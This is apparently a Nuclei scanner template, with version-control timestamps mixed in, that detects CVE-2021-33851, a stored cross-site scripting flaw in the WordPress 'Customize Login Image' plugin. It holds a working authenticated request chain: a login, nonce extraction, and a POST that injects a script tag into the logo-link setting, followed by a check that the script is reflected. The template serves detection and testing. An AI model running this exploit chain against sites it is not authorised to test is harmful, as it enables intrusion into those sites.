2022-10-18 23:15:31 +00:00
id : CVE-2021-33851
info :
2022-10-21 08:41:55 +00:00
name : Customize Login Image < 3.5.3 - Cross-Site Scripting
2022-10-18 23:15:31 +00:00
author : 8authur
severity : medium
description : |
2022-10-21 08:41:55 +00:00
A cross-site scripting (XSS) attack can cause arbitrary code (JavaScript) to run in a user's browser and can use an application as the vehicle for the attack. The XSS payload given in the "Custom logo link" executes whenever the user opens the Settings Page of the "Customize Login Image" Plugin.
2022-10-18 23:15:31 +00:00
reference :
2022-10-21 08:41:55 +00:00
- https://wpscan.com/vulnerability/c67753fb-9111-453e-951f-854c6ce31203
- https://cybersecurityworks.com/zerodays/cve-2021-33851-stored-cross-site-scripting-in-wordpress-customize-login-image.html
2022-10-18 23:15:31 +00:00
- https://wordpress.org/plugins/customize-login-image/
2022-10-21 08:41:55 +00:00
- https://nvd.nist.gov/vuln/detail/cve-2021-33851
2022-10-18 23:15:31 +00:00
classification :
2022-10-21 11:22:10 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score : 5.4
2022-10-18 23:15:31 +00:00
cve-id : CVE-2021-33851
2022-10-21 11:22:10 +00:00
cwe-id : CWE-79
2022-10-21 08:41:55 +00:00
metadata :
2022-10-21 11:22:10 +00:00
verified : "true"
tags : wpscan,cve2021,wordpress,customize-login-image,wp,authenticated,cve,wp-plugin,xss
2022-10-18 23:15:31 +00:00
requests :
- raw :
- |
2022-10-21 07:20:20 +00:00
POST /wp-login.php HTTP/1.1
2022-10-18 23:15:31 +00:00
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
2022-10-21 00:19:34 +00:00
2022-10-18 23:15:31 +00:00
log={{username}}&pwd={{password}}&wp-submit=Log+In
2022-10-21 00:19:34 +00:00
2022-10-18 23:15:31 +00:00
- |
2022-10-21 07:20:20 +00:00
GET /wp-admin/options-general.php?page=customize-login-image/customize-login-image-options.php HTTP/1.1
2022-10-18 23:15:31 +00:00
Host : {{Hostname}}
2022-10-21 00:19:34 +00:00
2022-10-18 23:15:31 +00:00
- |
2022-10-21 07:20:20 +00:00
POST /wp-admin/options.php HTTP/1.1
2022-10-18 23:15:31 +00:00
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
2022-10-21 00:19:34 +00:00
2022-10-21 08:41:55 +00:00
option_page=customize-login-image-settings-group&action=update&_wpnonce={{nonce}}&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Dcustomize-login-image%252Fcustomize-login-image-options.php%26settings-updated%3Dtrue&cli_logo_url=<script>alert(document.domain)</script>&cli_logo_file=&cli_login_background_color=&cli_custom_css=
2022-10-21 08:44:01 +00:00
2022-10-18 23:15:31 +00:00
- |
2022-10-21 07:20:20 +00:00
GET /wp-login.php HTTP/1.1
2022-10-18 23:15:31 +00:00
Host : {{Hostname}}
cookie-reuse : true
req-condition : true
matchers :
- type : dsl
dsl :
- 'status_code_4 == 200'
- 'contains(all_headers_4, "text/html")'
2022-10-21 08:41:55 +00:00
- 'contains(body_4, "Go to <script>alert(document.domain)</script>")'
2022-10-21 00:19:34 +00:00
condition : and
2022-10-21 08:44:01 +00:00
2022-10-21 08:41:55 +00:00
extractors :
- type : regex
name : nonce
part : body
group : 1
regex :
- 'name="_wpnonce" value="([0-9a-zA-Z]+)"'
internal : true
